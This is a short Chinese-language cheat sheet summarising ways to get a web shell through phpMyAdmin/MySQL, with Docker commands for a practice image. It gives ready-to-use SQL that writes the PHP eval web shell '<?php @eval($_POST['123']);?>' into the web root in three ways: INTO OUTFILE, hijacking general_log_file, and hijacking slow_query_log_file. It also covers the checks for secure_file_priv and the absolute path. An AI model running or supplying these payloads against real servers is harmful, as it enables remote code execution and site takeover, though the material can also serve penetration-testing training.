PHPMyadmin的Getshell方法汇总

docker pull registry.cn-hangzhou.aliyuncs.com/cnhongke/phpmyadmin:v06.30

docker run  --name cnlamp  -p 8080:80 -p 3306:3306  -d registry.cn-hangzhou.aliyuncs.com/cnhongke/phpmyadmin:v06.30#映射端口需要结合实际情况自行设定docker ps -a

outfile：--支持多行数据同时导出--使用union联合查询时，要保证两侧查询的列数相同--会在换行符制表符后面追加反斜杠--会在末尾追加换行
dumpfile：--每次只能导出一行数据--不会在换行符制表符后面追加反斜杠--不会在末尾追加换行
#因此我们平时直接写入命令的时候使用outfile即可，特定环境需要写入二进制文件时使用dumpfile。

--对web目录需要有写权限能够使用单引号(root)
--知道网站绝对路径(phpinfo/php探针/通过报错等)
--secure_file_priv没有具体值

--select @@basedir;    查找绝对路径--show global variables like '%secure_file_priv%';   查看有没有配置 secure_file_priv 功能--NULL       表示不允许导入或导出--/tmp       表示只允许在 /tmp 目录导入导出--空         表示不限制目录

select "<?php @eval($_POST['123']);?>" into outfile '/网站绝对路径/shell.php'
#网站绝对路径可借助phpinfo查看

--root权限--知道网站绝对路径

--SHOW VARIABLES LIKE '%general%';   查看配置默认是关闭状态
--set global general_log = on;       开启general_log模式
--set global general_log_file='日志路径shell02.php';   修改日志目录为shell地址 
--select "<?php @eval($_POST['123']);?>"        写入shell因为开启了日志记录功能，所执行的sql语句都会被记录在日志中

--root权限--知道网站绝对路径

--show variables like '%slow_query_log%';      查看慢查询日志开启情况
--set global slow_query_log=on;         开启慢查询日志
--set global slow_query_log_file='绝对路径/shell03.php';   修改日志文件存储的绝对路径
--select "<?php @eval($_POST['123']);?>" or sleep(10);      向日志文件中写入shell
#使用慢查询日志时，只有当查询时间超过系统时间(默认为10秒)时才会记录在日志中，使用如下语句可查看系统时间：--show global variables like '%long_query_time%';